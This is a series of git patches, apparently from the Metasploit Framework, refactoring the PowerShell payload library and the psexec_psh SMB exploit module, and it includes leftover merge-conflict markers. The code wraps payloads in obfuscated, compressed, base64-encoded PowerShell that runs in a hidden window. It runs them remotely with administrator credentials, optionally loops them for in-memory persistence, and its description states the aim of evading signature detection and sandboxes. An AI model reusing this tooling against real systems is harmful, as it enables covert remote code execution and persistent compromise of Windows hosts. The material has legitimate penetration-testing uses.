-		subs.split(';').each do |set|
-			new_subs << set.split(',', 2)
-		end
-		return new_subs
-	end
+  #
+  # Return an array of substitutions for use in make_subs
+  #
+  def process_subs(subs)
+    return [] if subs.nil? or subs.empty?
+    new_subs = []
+    subs.split(';').each do |set|
+      new_subs << set.split(',', 2)
+    end
+    return new_subs
+  end
 
-	#
-<<<<<<< HEAD
-	# Return a gzip compressed powershell script
-	# Will invoke PSH modifiers as enabled
-	#
-	def compress_script(script_in, eof = nil)
-		# Build script object
-		psh = PshScript.new(script_in)
-		# Invoke enabled modifiers
-		datastore.select {|k,v| k =~ /^PSH::(strip|sub)/ and v == 'true' }.keys.map do |k|
-			mod_method = k.split('::').last.intern
-			psh.send(mod_method)
-		end
-		return psh.compress_code(eof)
-=======
-	# Read in a powershell script stored in +script+
-	#
-	def read_script(script)
-		script_in = ''
-		begin
-			# Open script file for reading
-			fd = ::File.new(script, 'r')
-			while (line = fd.gets)
-				script_in << line
-			end
+  #
+  # Return a gzip compressed powershell script
+  # Will invoke PSH modifiers as enabled
+  #
+  def compress_script(script_in, eof = nil)
+    # Build script object
+    psh = PshScript.new(script_in)
+    # Invoke enabled modifiers
+    datastore.select {|k,v| k =~ /^PSH::(strip|sub)/ and v == 'true' }.keys.map do |k|
+      mod_method = k.split('::').last.intern
+      psh.send(mod_method)
+    end
+    return psh.compress_code(eof)
+  end
 
-			# Close open file
-			fd.close()
-		rescue Errno::ENAMETOOLONG, Errno::ENOENT
-			# Treat script as a... script
-			script_in = script
-		end
-		return script_in
-	end
+  #
+  # Runs powershell in hidden window raising interactive proc msg
+  #
+  def run_hidden_psh(ps_code,ps_bin='powershell.exe')
+    ps_args = " -EncodedCommand #{ compress_script(ps_code) } "
 
-
-	#
-	# Return a zlib compressed powershell script
-	#
-	def compress_script(script_in, eof = nil)
-
-		# Compress using the Deflate algorithm
-		compressed_stream = ::Zlib::Deflate.deflate(script_in,
-			::Zlib::BEST_COMPRESSION)
-
-		# Base64 encode the compressed file contents
-		encoded_stream = Rex::Text.encode_base64(compressed_stream)
-
-		# Build the powershell expression
-		# Decode base64 encoded command and create a stream object
-		psh_expression =  "$stream = New-Object IO.MemoryStream(,"
-		psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
-		# Read & delete the first two bytes due to incompatibility with MS
-		psh_expression << "$stream.ReadByte()|Out-Null;"
-		psh_expression << "$stream.ReadByte()|Out-Null;"
-		# Uncompress and invoke the expression (execute)
-		psh_expression << "$(Invoke-Expression $(New-Object IO.StreamReader("
-		psh_expression << "$(New-Object IO.Compression.DeflateStream("
-		psh_expression << "$stream,"
-		psh_expression << "[IO.Compression.CompressionMode]::Decompress)),"
-		psh_expression << "[Text.Encoding]::ASCII)).ReadToEnd());"
-
-		# If eof is set, add a marker to signify end of script output
-		if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
-
-		# Convert expression to unicode
-		unicode_expression = Rex::Text.to_unicode(psh_expression)
-
-		# Base64 encode the unicode expression
-		encoded_expression = Rex::Text.encode_base64(unicode_expression)
-
-		return encoded_expression
->>>>>>> master
-	end
-
-	#
-	# Runs powershell in hidden window raising interactive proc msg
-	#
-	def run_hidden_psh(ps_code,ps_bin='powershell.exe')
-		ps_args = " -EncodedCommand #{ compress_script(ps_code) } "
-
-		ps_wrapper = <<EOS
+    ps_wrapper = <<EOS
 $si = New-Object System.Diagnostics.ProcessStartInfo
 $si.FileName = "#{ps_bin}"
 $si.Arguments = '#{ps_args}'
@@ -180,137 +92,98 @@ $si.CreateNoWindow = $True
 $p = [System.Diagnostics.Process]::Start($si)
 EOS
 
-<<<<<<< HEAD
-		return ps_wrapper.gsub("\n",';')
-=======
-		return ps_wrapper
->>>>>>> master
-	end
+    return ps_wrapper.gsub("\n",';')
+  end
 
-	#
-	# Creates cmd script to execute psh payload
-	#
-<<<<<<< HEAD
-	def cmd_psh_payload(pay, old_psh=false)
-=======
-	def cmd_psh_payload(pay, old_psh=datastore['PSH_OLD_METHOD'], wow64=datastore['RUN_WOW64'])
->>>>>>> master
-		# Allow powershell 1.0 format
-		if old_psh
-			psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
-		else
-			psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
-		end
-		# Run our payload in a while loop
-		if datastore['PERSIST']
-			fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
-			sleep_time = rand(5)+5
-			psh_payload  = "function #{fun_name}{#{psh_payload}};"
-			psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
-		end
-<<<<<<< HEAD
-		# Determine appropriate architecture, manual method reduces script size
-		ps_bin = datastore['RUN_WOW64'] ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
-		# Wrap in hidden runtime
-		psh_payload = run_hidden_psh(psh_payload,ps_bin)
-		# Convert to base64 for -encodedcommand execution
-		command = "%COMSPEC% /B /C start /min powershell.exe -Command \"#{psh_payload.gsub('"','\"')}\"\r\n"
-	end
+  #
+  # Creates cmd script to execute psh payload
+  #
+  def cmd_psh_payload(pay, old_psh=false)
+    # Allow powershell 1.0 format
+    if old_psh
+      psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
+    else
+      psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
+    end
+    # Run our payload in a while loop
+    if datastore['PERSIST']
+      fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
+      sleep_time = rand(5)+5
+      psh_payload  = "function #{fun_name}{#{psh_payload}};"
+      psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
+    end
+    # Determine appropriate architecture, manual method reduces script size
+    ps_bin = datastore['RUN_WOW64'] ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
+    # Wrap in hidden runtime
+    psh_payload = run_hidden_psh(psh_payload,ps_bin)
+    # Convert to base64 for -encodedcommand execution
+    command = "%COMSPEC% /B /C start /min powershell.exe -Command \"#{psh_payload.gsub('"','\"')}\"\r\n"
+  end
 
 
-	#
-	# Useful method cache
-	#
-	module PshMethods
+  #
+  # Useful method cache
+  #
+  module PshMethods
 
-		#
-		# Convert binary to byte array, read from file if able
-		#
-		def self.to_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
-			code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
-			code = code.unpack('C*')
-			psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
-			lines = []
-			1.upto(code.length-1) do |byte|
-				if(byte % 10 == 0)
-					lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
-				else
-					lines.push ",0x#{code[byte].to_s(16)}"
-				end
-			end
+    #
+    # Convert binary to byte array, read from file if able
+    #
+    def self.to_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
+      code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
+      code = code.unpack('C*')
+      psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
+      lines = []
+      1.upto(code.length-1) do |byte|
+        if(byte % 10 == 0)
+          lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
+        else
+          lines.push ",0x#{code[byte].to_s(16)}"
+        end
+      end
 
-			return psh << lines.join("") + "\r\n"
-		end
+      return psh << lines.join("") + "\r\n"
+    end
 
-		#
-		# Download file to host via PSH
-		#
-		def self.download(src,target=nil)
-			target ||= '$pwd\\' << src.split('/').last
-			return %Q^(new-object System.Net.WebClient).Downloadfile("#{src}", "#{target}")^
-		end
+    #
+    # Download file to host via PSH
+    #
+    def self.download(src,target=nil)
+      target ||= '$pwd\\' << src.split('/').last
+      return %Q^(new-object System.Net.WebClient).Downloadfile("#{src}", "#{target}")^
+    end
 
-		#
-		# Uninstall app
-		#
-		def self.uninstall(app,fuzzy=true)
-			match = fuzzy ? '-like' : '-eq'
-			return %Q^$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name #{match} "#{app}" }; $app.Uninstall()^
-		end
+    #
+    # Uninstall app
+    #
+    def self.uninstall(app,fuzzy=true)
+      match = fuzzy ? '-like' : '-eq'
+      return %Q^$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name #{match} "#{app}" }; $app.Uninstall()^
+    end
 
-		#
-		# Create secure string from plaintext
-		#
-		def self.secure_string(str)
-			return %Q^ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$^
-		end
+    #
+    # Create secure string from plaintext
+    #
+    def self.secure_string(str)
+      return %Q^ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$^
+    end
 
-		#
-		# MISC
-		#
+    #
+    # MISC
+    #
 
-		#
-		# Find PID of file locker
-		#
-		def self.who_locked_file?(filename)
-			return %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^
-		end
+    #
+    # Find PID of file locker
+    #
+    def self.who_locked_file?(filename)
+      return %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^
+    end
 
 
-		def self.get_last_login(user)
-			return %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
-		end
-	end
-=======
-		# Determine appropriate architecture
-		ps_bin = wow64 ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
-		# Wrap in hidden runtime
-		psh_payload = run_hidden_psh(psh_payload,ps_bin)
-		# Convert to base64 for -encodedcommand execution
-		command = "%COMSPEC% /B /C start powershell.exe -Command \"#{psh_payload.gsub("\n",';').gsub('"','\"')}\"\r\n"
-	end
-
-	#
-	# Convert binary to byte array, read from file if able
-	#
-	def build_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
-		code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
-		code = code.unpack('C*')
-		psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
-		lines = []
-		1.upto(code.length-1) do |byte|
-			if(byte % 10 == 0)
-				lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
-			else
-				lines.push ",0x#{code[byte].to_s(16)}"
-			end
-		end
-		psh << lines.join("") + "\r\n"
-	end
-
-
-
->>>>>>> master
+    def self.get_last_login(user)
+      return %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
+    end
+  end
 end
 end
 

From b3fab9a342131f9fcb6d7f3e8ac2e0da069765c7 Mon Sep 17 00:00:00 2001
From: RageLtMan <rageltman [at] sempervictus>
Date: Sun, 28 Jul 2013 19:23:37 -0400
Subject: [PATCH 007/321] Fix git branch mauling - reintroduce psexec_psh

Replace powershell lib which snuck in as psexec_psh.
Introduce psexec_psh module which uses the Rex and Msf PSH
methods provided in the lib import.
---
 modules/exploits/windows/smb/psexec_psh.rb | 264 +++++++--------------
 1 file changed, 89 insertions(+), 175 deletions(-)

diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb
index ac66534343..bc8920d8c3 100644
--- a/modules/exploits/windows/smb/psexec_psh.rb
+++ b/modules/exploits/windows/smb/psexec_psh.rb
@@ -1,189 +1,103 @@
 # -*- coding: binary -*-
-require 'rex/exploitation/powershell'
 
-module Msf
-module Exploit::Powershell
+require 'msf/core'
 
-	class PshScript < Rex::Exploitation::Powershell::Script
-	end
+class Metasploit3 < Msf::Exploit::Remote
+		Rank = ManualRanking
+
+	# Exploit mixins should be called first
+	include Msf::Exploit::Remote::SMB::Psexec
+	include Msf::Exploit::Powershell
+	include Msf::Auxiliary::Report
+	include Msf::Exploit::EXE
 
 	def initialize(info = {})
-		super
-		register_advanced_options(
-			[
-				OptBool.new('RUN_WOW64', [
-					false,
-					'Execute powershell in 32bit compatibility mode, payloads need native arch',
-					false
-						]),
-				OptBool.new('PSH::strip_comments', [false, 'Strip comments', true]),
-				OptBool.new('PSH::strip_whitespace', [false, 'Strip whitespace', false]),
-				OptBool.new('PSH::sub_vars', [false, 'Substitute variable names', false]),
-				OptBool.new('PSH::sub_funcs', [false, 'Substitute function names', false]),
-			], self.class)
+		super(update_info(info,
+			'Name'           => 'Microsoft Windows Authenticated Powershell Command Execution',
+			'Description'    => %q{
+					This module uses a valid administrator username and password to execute a powershell
+				payload using a similar technique to the "psexec" utility provided by SysInternals. The
+				payload is obfuscated, gzip compressed, then encoded in base64 and executed from the commandline
+				using the -encodedcommand flag. Using this method, the payload is never written to disk, and
+				given that each payload is unique, is not very prone to signature based detection on the wire.
+				Since executing shellcode in .NET requires the use of system resources from unmanaged memory space,
+				the .NET (PSH) architecture must match that of the payload. Lastly, a persist option is provided
+				to execute the payload in a while loop in order to maintain a form of in-mem persistence. In the event
+				of a sandbox observing PSH execution, a delay and other obfuscation may be added to avoid detection.
+				In order to avoid interactive process notifications for the current user, the psh payload has
+				been reduced in size and wrapped in a powershell invocation which hides the window entirely.
+			},
+
+			'Author'         => [
+				'RageLtMan <rageltman[at]sempervictus'
+			],
+
+			'License'        => MSF_LICENSE,
+			'Privileged'     => true,
+			'DefaultOptions' =>
+				{
+					'WfsDelay'     => 10,
+					'EXITFUNC' => 'thread'
+				},
+			'Payload'        =>
+				{
+					'Space'        => 8192,
+					'DisableNops'  => true,
+					'StackAdjustment' => -3500
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Automatic', { } ],
+				],
+			'DefaultTarget'  => 0,
+			'References'     => [
+				[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
+				[ 'OSVDB', '3106'],
+				[ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ],
+				[ 'URL', 'http://sourceforge.net/projects/smbexec/' ],
+				[ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
+			]
+		))
+
+		register_options([
+			OptBool.new('PERSIST', [false, 'Run the payload in a loop']),
+			OptBool.new('PSH_OLD_METHOD', [false, 'Use powershell 1.0', false]),
+			OptBool.new('DryRun',[false,'dry run',false]),
+		], self.class)
 	end
 
-	#
-	# Reads script into a PshScript
-	#
-	def read_script(script)
-		return PshScript.new(script)
-	end
 
-	#
-	# Insert substitutions into the powershell script
-	#
-	def make_subs(script, subs)
-		if ::File.file?(script)
-			script = ::File.read(script)
+	def exploit
+		command = cmd_psh_payload(payload.encoded,datastore['PSH_OLD_METHOD'])
+		if datastore['DryRun']
+			print_good command
+			return
 		end
 
-		subs.each do |set|
-			script.gsub!(set[0],set[1])
-		end
-		# if datastore['VERBOSE']
-		#   print_good("Final Script: ")
-		#   script.each_line {|l| print_status("\t#{l}")}
-		# end
-		return script
-	end
-
-	#
-	# Return an array of substitutions for use in make_subs
-	#
-	def process_subs(subs)
-		return [] if subs.nil? or subs.empty?
-		new_subs = []
-		subs.split(';').each do |set|
-			new_subs << set.split(',', 2)
-		end
-		return new_subs
-	end
-
-	#
-	# Return a gzip compressed powershell script
-	# Will invoke PSH modifiers as enabled
-	#
-	def compress_script(script_in, eof = nil)
-		# Build script object
-		psh = PshScript.new(script_in)
-		# Invoke enabled modifiers
-		datastore.select {|k,v| k =~ /^PSH::(strip|sub)/ and v == 'true' }.keys.map do |k|
-			mod_method = k.split('::').last.intern
-			psh.send(mod_method)
-		end
-		return psh.compress_code(eof)
-	end
-
-	#
-	# Runs powershell in hidden window raising interactive proc msg
-	#
-	def run_hidden_psh(ps_code,ps_bin='powershell.exe')
-		ps_args = " -EncodedCommand #{ compress_script(ps_code) } "
-
-		ps_wrapper = <<EOS
-$si = New-Object System.Diagnostics.ProcessStartInfo
-$si.FileName = "#{ps_bin}"
-$si.Arguments = '#{ps_args}'
-$si.UseShellExecute = $false
-$si.RedirectStandardOutput = $true
-$si.WindowStyle = 'Hidden'
-$si.CreateNoWindow = $True
-$p = [System.Diagnostics.Process]::Start($si)
-EOS
-
-		return ps_wrapper.gsub("\n",';')
-	end
-
-	#
-	# Creates cmd script to execute psh payload
-	#
-	def cmd_psh_payload(pay, old_psh=false)
-		# Allow powershell 1.0 format
-		if old_psh
-			psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
-		else
-			psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
-		end
-		# Run our payload in a while loop
-		if datastore['PERSIST']
-			fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
-			sleep_time = rand(5)+5
-			psh_payload  = "function #{fun_name}{#{psh_payload}};"
-			psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
-		end
-		# Determine appropriate architecture, manual method reduces script size
-		ps_bin = datastore['RUN_WOW64'] ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
-		# Wrap in hidden runtime
-		psh_payload = run_hidden_psh(psh_payload,ps_bin)
-		# Convert to base64 for -encodedcommand execution
-		command = "%COMSPEC% /B /C start /min powershell.exe -Command \"#{psh_payload.gsub('"','\"')}\"\r\n"
-	end
-
-
-	#
-	# Useful method cache
-	#
-	module PshMethods
-
-		#
-		# Convert binary to byte array, read from file if able
-		#
-		def self.to_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
-			code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
-			code = code.unpack('C*')
-			psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
-			lines = []
-			1.upto(code.length-1) do |byte|
-				if(byte % 10 == 0)
-					lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
-				else
-					lines.push ",0x#{code[byte].to_s(16)}"
-				end
+		#Try and authenticate with given credentials
+		if connect
+			begin
+				smb_login
+			rescue StandardError => autherror
+				print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
+				return
 			end
-
-			return psh << lines.join("") + "\r\n"
-		end
-
-		#
-		# Download file to host via PSH
-		#
-		def self.download(src,target=nil)
-			target ||= '$pwd\\' << src.split('/').last
-			return %Q^(new-object System.Net.WebClient).Downloadfile("#{src}", "#{target}")^
-		end
-
-		#
-		# Uninstall app
-		#
-		def self.uninstall(app,fuzzy=true)
-			match = fuzzy ? '-like' : '-eq'
-			return %Q^$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name #{match} "#{app}" }; $app.Uninstall()^
-		end
-
-		#
-		# Create secure string from plaintext
-		#
-		def self.secure_string(str)
-			return %Q^ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$^
-		end
-
-		#
-		# MISC
-		#
-
-		#
-		# Find PID of file locker
-		#
-		def self.who_locked_file?(filename)
-			return %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^
-		end
-
-
-		def self.get_last_login(user)
-			return %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
+			# Execute the powershell command
+			begin
+				print_status("#{peer} - Executing the payload...")
+				#vprint_good(command)
+				return psexec(command)
+			rescue StandardError => exec_command_error
+				print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
+				return false
+			end
+			disconnect
 		end
 	end
-end
-end
 
+	def peer
+		return "#{rhost}:#{rport}"
+	end
+
+end

From 176de5a380d89f8264700782a9c938ba7c57b3b6 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Mon, 29 Jul 2013 15:13:59 +0100
Subject: [PATCH 008/321] Selective psexec_psh merge.

---
 modules/exploits/windows/smb/psexec_psh.rb | 39 +++++++++++++---------
 1 file changed, 23 insertions(+), 16 deletions(-)

diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb
index 15f41e0128..e239679939 100644
--- a/modules/exploits/windows/smb/psexec_psh.rb
+++ b/modules/exploits/windows/smb/psexec_psh.rb
@@ -23,15 +23,15 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Description'    => %q{
 					This module uses a valid administrator username and password to execute a powershell
 				payload using a similar technique to the "psexec" utility provided by SysInternals. The
-				payload is encoded in base64 and executed from the commandline using the -encodedcommand
-				flag. Using this method, the payload is never written to disk, and given that each payload
-				is unique, is less prone to signature based detection. Since executing shellcode in .NET
-				requires the use of system resources from unmanaged memory space, the .NET (PSH) architecture
-				must match that of the payload. Lastly, a persist option is provided to execute the payload
-				in a while loop in order to maintain a form of persistence. In the event of a sandbox
-				observing PSH execution, a delay and other obfuscation may be added to avoid detection.
+				payload is obfuscated, gzip compressed, then encoded in base64 and executed from the commandline
+				using the -encodedcommand flag. Using this method, the payload is never written to disk, and
+				given that each payload is unique, is not very prone to signature based detection on the wire.
+				Since executing shellcode in .NET requires the use of system resources from unmanaged memory space,
+				the .NET (PSH) architecture must match that of the payload. Lastly, a persist option is provided
+				to execute the payload in a while loop in order to maintain a form of in-mem persistence. In the event
+				of a sandbox observing PSH execution, a delay and other obfuscation may be added to avoid detection.
 				In order to avoid interactive process notifications for the current user, the psh payload has
-				been reduced in size and wrapped in a powershell invocation which hides the process entirely.
+				been reduced in size and wrapped in a powershell invocation which hides the window entirely.
 			},
 
 			'Author'         => [
@@ -68,16 +68,21 @@ class Metasploit3 < Msf::Exploit::Remote
 				[ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
 			]
 		))
+
+		register_options([
+			OptBool.new('DryRun',[false,'dry run',false]),
+		], self.class)
 	end
 
+
 	def exploit
 		command = cmd_psh_payload(payload.encoded)
-
-		if datastore['PERSIST'] and not datastore['DisablePayloadHandler']
-			print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PERSIST option.")
+		if datastore['DryRun']
+			print_good command
+			return
 		end
 
-		if datastore['RUN_WOW64'] and target_arch.first == "x86_64"
+		if datastore['PSH::RUN_WOW64'] and target_arch.first == "x86_64"
 			fail_with(Exploit::Failure::BadConfig, "Select an x86 target and payload with RUN_WOW64 enabled")
 		end
 
@@ -86,22 +91,24 @@ class Metasploit3 < Msf::Exploit::Remote
 			begin
 				smb_login
 			rescue StandardError => autherror
-				disconnect
 				fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}")
+      ensure
+        disconnect
 			end
 			# Execute the powershell command
 			print_status("#{peer} - Executing the payload...")
 			begin
 				return psexec(command)
 			rescue StandardError => exec_command_error
-				disconnect
 				fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
-			end
+      ensure
+        disconnect
+      end
 		end
 	end
 
 	def peer
-		return "#{rhost}:#{rport}"
+	  "#{rhost}:#{rport}"
 	end
 end
 

From 59a2c7e940e3c3d29dd4f5dc48e21a9d906c2f68 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Mon, 29 Jul 2013 15:24:29 +0100
Subject: [PATCH 009/321] Merge Upstream Exploit::Powershell

---
 lib/msf/core/exploit/powershell.rb | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 5539f5c8f4..f2b2cbaccb 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -11,7 +11,9 @@ module Exploit::Powershell
     super
     register_advanced_options(
       [
-        OptBool.new('RUN_WOW64', [
+				OptBool.new('PSH::PERSIST', [true, 'Run the payload in a loop', false]),
+				OptBool.new('PSH::OLD_METHOD', [true, 'Use powershell 1.0', false]),
+        OptBool.new('PSH::RUN_WOW64', [
           false,
           'Execute powershell in 32bit compatibility mode, payloads need native arch',
           false

From e1cfe7cfe23a39db8015059a6a4505ca7e1f582c Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Mon, 29 Jul 2013 15:24:29 +0100
Subject: [PATCH 010/321] Update datastore changes

---
 lib/msf/core/exploit/powershell.rb | 10 ++++++----
 1 file changed, 6 insertions(+), 4 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 5539f5c8f4..ec0cd1b451 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -11,7 +11,9 @@ module Exploit::Powershell
     super
     register_advanced_options(
       [
-        OptBool.new('RUN_WOW64', [
+				OptBool.new('PSH::PERSIST', [true, 'Run the payload in a loop', false]),
+				OptBool.new('PSH::OLD_METHOD', [true, 'Use powershell 1.0', false]),
+        OptBool.new('PSH::RUN_WOW64', [
           false,
           'Execute powershell in 32bit compatibility mode, payloads need native arch',
           false
@@ -98,7 +100,7 @@ EOS
   #
   # Creates cmd script to execute psh payload
   #
-  def cmd_psh_payload(pay, old_psh=false)
+	def cmd_psh_payload(pay, old_psh=datastore['PSH::OLD_METHOD'], wow64=datastore['PSH::RUN_WOW64'])
     # Allow powershell 1.0 format
     if old_psh
       psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
@@ -106,14 +108,14 @@ EOS
       psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
     end
     # Run our payload in a while loop
-    if datastore['PERSIST']
+    if datastore['PSH::PERSIST']
       fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
       sleep_time = rand(5)+5
       psh_payload  = "function #{fun_name}{#{psh_payload}};"
       psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
     end
     # Determine appropriate architecture, manual method reduces script size
-    ps_bin = datastore['RUN_WOW64'] ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
+		ps_bin = wow64 ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
     # Wrap in hidden runtime
     psh_payload = run_hidden_psh(psh_payload,ps_bin)
     # Convert to base64 for -encodedcommand execution

From b241b5a8949022df83340e9bd04877d2079b68e8 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 13 Sep 2013 19:06:37 +0100
Subject: [PATCH 011/321] Apply comments

---
 lib/msf/core/exploit/powershell.rb            | 22 ++++++++++---------
 .../exploits/windows/misc/psh_web_delivery.rb |  2 +-
 modules/exploits/windows/smb/psexec_psh.rb    | 18 ++++++---------
 3 files changed, 20 insertions(+), 22 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index ec0cd1b451..a83b2370ff 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -11,11 +11,11 @@ module Exploit::Powershell
     super
     register_advanced_options(
       [
-				OptBool.new('PSH::PERSIST', [true, 'Run the payload in a loop', false]),
-				OptBool.new('PSH::OLD_METHOD', [true, 'Use powershell 1.0', false]),
-        OptBool.new('PSH::RUN_WOW64', [
+        OptBool.new('PSH::persist', [true, 'Run the payload in a loop', false]),
+        OptBool.new('PSH::old_technique', [true, 'Use powershell 1.0', false]),
+        OptBool.new('PSH::run_wow64', [
           false,
-          'Execute powershell in 32bit compatibility mode, payloads need native arch',
+          'Execute powershell in 32bit compatibility mode, payloads need x86 arch',
           false
             ]),
         OptBool.new('PSH::strip_comments', [false, 'Strip comments', true]),
@@ -28,12 +28,14 @@ module Exploit::Powershell
   #
   # Reads script into a PshScript
   #
-  def read_script(script)
-    return PshScript.new(script)
+  def read_script(script_path)
+    return PshScript.new(script_path)
   end
 
   #
   # Insert substitutions into the powershell script
+  # If script is a path to a file then read the file
+  # otherwise treat it as the contents of a file
   #
   def make_subs(script, subs)
     if ::File.file?(script)
@@ -81,7 +83,7 @@ module Exploit::Powershell
   # Runs powershell in hidden window raising interactive proc msg
   #
   def run_hidden_psh(ps_code,ps_bin='powershell.exe')
-    ps_args = " -EncodedCommand #{ compress_script(ps_code) } "
+    ps_args = " -e #{ compress_script(ps_code) } "
 
     ps_wrapper = <<EOS
 $si = New-Object System.Diagnostics.ProcessStartInfo
@@ -100,7 +102,7 @@ EOS
   #
   # Creates cmd script to execute psh payload
   #
-	def cmd_psh_payload(pay, old_psh=datastore['PSH::OLD_METHOD'], wow64=datastore['PSH::RUN_WOW64'])
+  def cmd_psh_payload(pay, old_psh=datastore['PSH::old_method'], wow64=datastore['PSH::run_wow64'])
     # Allow powershell 1.0 format
     if old_psh
       psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
@@ -108,7 +110,7 @@ EOS
       psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
     end
     # Run our payload in a while loop
-    if datastore['PSH::PERSIST']
+    if datastore['PSH::persist']
       fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
       sleep_time = rand(5)+5
       psh_payload  = "function #{fun_name}{#{psh_payload}};"
@@ -119,7 +121,7 @@ EOS
     # Wrap in hidden runtime
     psh_payload = run_hidden_psh(psh_payload,ps_bin)
     # Convert to base64 for -encodedcommand execution
-    command = "%COMSPEC% /B /C start /min powershell.exe -Command \"#{psh_payload.gsub('"','\"')}\"\r\n"
+    command = "%COMSPEC% /B /C start /min powershell.exe -c #{psh_payload.gsub('"','\"')}\r\n"
   end
 
 
diff --git a/modules/exploits/windows/misc/psh_web_delivery.rb b/modules/exploits/windows/misc/psh_web_delivery.rb
index 96036180a1..59beb856dd 100644
--- a/modules/exploits/windows/misc/psh_web_delivery.rb
+++ b/modules/exploits/windows/misc/psh_web_delivery.rb
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		url = get_uri()
